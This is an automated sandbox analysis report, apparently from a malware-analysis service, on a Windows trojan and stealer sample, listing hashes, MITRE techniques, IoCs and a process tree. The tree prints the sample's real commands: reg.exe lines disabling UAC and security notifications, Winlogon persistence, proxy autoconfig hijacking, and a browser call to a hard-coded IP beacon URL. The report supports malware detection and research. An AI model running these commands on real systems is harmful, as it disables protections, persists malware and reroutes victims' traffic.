961d0f8fb326d6c85fc2367de318299d6ecaca04e7ea935d4cf95019b373da05

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02/10/2024, 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
Size

120KB
MD5

09c331740a041d45989bd0c4f435b950
SHA1

fec50f94d6617d867a5c0010ac5b607b6e375f0b
SHA256

961d0f8fb326d6c85fc2367de318299d6ecaca04e7ea935d4cf95019b373da05
SHA512

bdc5d5cd4c97933ff0c6b39457a5cc27ecdec2bae7ba70400fd7f0f7149a3003c30e4ab7c3b88304ea0ec5bed2e5537f20bf59de6f2bee4ca60b5a4bbf4f8e5c
SSDEEP

3072:OSB1Ed0h4MEHZB5TiVhf/rw9O8NMUEfyUWEA:OSB1Ed0h/CB5OVhc9OsvEs

Score

10^/10

discovery evasion persistence spyware stealer trojan upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\crss.exe,"	reg.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	reg.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	jp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3908	jp.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000002341d-4.dat	upx
behavioral2/memory/3908-8-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral2/memory/3908-28-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral2/memory/3908-47-0x0000000000400000-0x0000000000413000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\java.policy	cmd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\java.policy	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3732464824"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4099f6e4a414db01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434622572"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f1000000000200000000001066000000010000200000009b794058829ac092f7c38d37de7422955c1cc577b1cd2eb081491f8cd1e5ff4b000000000e800000000200002000000003be459e82d4efddfec26a0a21c63bb74288256cc61876d9f3f78fc9771175e020000000b3395c0c13232ea0a264255840aacd9705e42f23c0ce05f28ae9fbb707e8e26d400000002e93e7ca55959173d7a716c6bab021bffc6880f2a1da45947e08ed33dbc61cb98eeef624c6c1335a91b5bc32635d5470c3605cb1ca748e2dcc2bd5a04f836f7c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31134884"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3745745897"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0A010BF6-8098-11EF-BB4F-66FD5BE5AD11} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3054fbe4a414db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3732308418"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134884"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31134884"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001bc9387f4f791b45af7c7e57591307f1000000000200000000001066000000010000200000004a0d425e8ec9c3f24b4b4d2bf598ddc7cbdbf1d58d9c1612a57f5e12e623fb0e000000000e80000000020000200000004e98bb9df477c1ae8572a4002d9caf49fdee832d3bd5d129d83d6f41e2c65a0420000000c64fd821295d874c66fd58ca25d41870738b3ddba8c4fce267b8793259809f5040000000ab9dba65be05c5f64877c6540e814af14278cbe164756d031b09c3f99f53329c6427e9e0635769627a30dc4ee6f4c2072ad2616f0f056509373a681598fbe072	iexplore.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4052	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4052	iexplore.exe
4052	iexplore.exe
3532	IEXPLORE.EXE
3532	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1952 wrote to memory of 3908	1952	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	81
PID 1952 wrote to memory of 3908	1952	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	81
PID 1952 wrote to memory of 3908	1952	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	81
PID 3908 wrote to memory of 5004	3908	jp.exe	82
PID 3908 wrote to memory of 5004	3908	jp.exe	82
PID 3908 wrote to memory of 5004	3908	jp.exe	82
PID 5004 wrote to memory of 4052	5004	cmd.exe	85
PID 5004 wrote to memory of 4052	5004	cmd.exe	85
PID 5004 wrote to memory of 3716	5004	cmd.exe	86
PID 5004 wrote to memory of 3716	5004	cmd.exe	86
PID 5004 wrote to memory of 3716	5004	cmd.exe	86
PID 5004 wrote to memory of 1644	5004	cmd.exe	88
PID 5004 wrote to memory of 1644	5004	cmd.exe	88
PID 5004 wrote to memory of 1644	5004	cmd.exe	88
PID 5004 wrote to memory of 4084	5004	cmd.exe	89
PID 5004 wrote to memory of 4084	5004	cmd.exe	89
PID 5004 wrote to memory of 4084	5004	cmd.exe	89
PID 5004 wrote to memory of 3880	5004	cmd.exe	90
PID 5004 wrote to memory of 3880	5004	cmd.exe	90
PID 5004 wrote to memory of 3880	5004	cmd.exe	90
PID 5004 wrote to memory of 664	5004	cmd.exe	91
PID 5004 wrote to memory of 664	5004	cmd.exe	91
PID 5004 wrote to memory of 664	5004	cmd.exe	91
PID 5004 wrote to memory of 4948	5004	cmd.exe	92
PID 5004 wrote to memory of 4948	5004	cmd.exe	92
PID 5004 wrote to memory of 4948	5004	cmd.exe	92
PID 5004 wrote to memory of 760	5004	cmd.exe	93
PID 5004 wrote to memory of 760	5004	cmd.exe	93
PID 5004 wrote to memory of 760	5004	cmd.exe	93
PID 5004 wrote to memory of 4704	5004	cmd.exe	94
PID 5004 wrote to memory of 4704	5004	cmd.exe	94
PID 5004 wrote to memory of 4704	5004	cmd.exe	94
PID 5004 wrote to memory of 752	5004	cmd.exe	95
PID 5004 wrote to memory of 752	5004	cmd.exe	95
PID 5004 wrote to memory of 752	5004	cmd.exe	95
PID 5004 wrote to memory of 2476	5004	cmd.exe	96
PID 5004 wrote to memory of 2476	5004	cmd.exe	96
PID 5004 wrote to memory of 2476	5004	cmd.exe	96
PID 5004 wrote to memory of 2456	5004	cmd.exe	97
PID 5004 wrote to memory of 2456	5004	cmd.exe	97
PID 5004 wrote to memory of 2456	5004	cmd.exe	97
PID 5004 wrote to memory of 4776	5004	cmd.exe	98
PID 5004 wrote to memory of 4776	5004	cmd.exe	98
PID 5004 wrote to memory of 4776	5004	cmd.exe	98
PID 5004 wrote to memory of 4716	5004	cmd.exe	99
PID 5004 wrote to memory of 4716	5004	cmd.exe	99
PID 5004 wrote to memory of 4716	5004	cmd.exe	99
PID 4052 wrote to memory of 3532	4052	iexplore.exe	100
PID 4052 wrote to memory of 3532	4052	iexplore.exe	100
PID 4052 wrote to memory of 3532	4052	iexplore.exe	100
PID 5004 wrote to memory of 1464	5004	cmd.exe	101
PID 5004 wrote to memory of 1464	5004	cmd.exe	101
PID 5004 wrote to memory of 1464	5004	cmd.exe	101
PID 5004 wrote to memory of 2480	5004	cmd.exe	102
PID 5004 wrote to memory of 2480	5004	cmd.exe	102
PID 5004 wrote to memory of 2480	5004	cmd.exe	102
PID 5004 wrote to memory of 4156	5004	cmd.exe	103
PID 5004 wrote to memory of 4156	5004	cmd.exe	103
PID 5004 wrote to memory of 4156	5004	cmd.exe	103
PID 5004 wrote to memory of 4844	5004	cmd.exe	104
PID 5004 wrote to memory of 4844	5004	cmd.exe	104
PID 5004 wrote to memory of 4844	5004	cmd.exe	104
PID 5004 wrote to memory of 3256	5004	cmd.exe	105
PID 5004 wrote to memory of 3256	5004	cmd.exe	105

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
916	attrib.exe
2964	attrib.exe
4468	attrib.exe

C:\Users\Admin\AppData\Local\Temp\09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952
- C:\Users\Admin\AppData\Local\Temp\jp.exe
  "C:\Users\Admin\AppData\Local\Temp\jp.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F78F.tmp\jp.bat" "
    3⤵
    - Checks computer location settings
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" "http://176.31.114.92/e/j.php?a=Admin&b=ODZKDRGV"
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4052
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4052 CREDAT:17410 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3532
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file createnew "C:\Users\Admin\AppData\Local\Temp\ok.db" 666"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3716
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:1644
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Users\Admin\AppData\Local\Temp\crss.exe," /f
      4⤵
      Modifies WinLogon for persistence
      System Location Discovery: System Language Discovery
      PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3880
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:664
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:4948
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4704
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/ODZKDRGV.txt" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2476
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4776
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1464
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4156
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4844
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3256
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2244
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
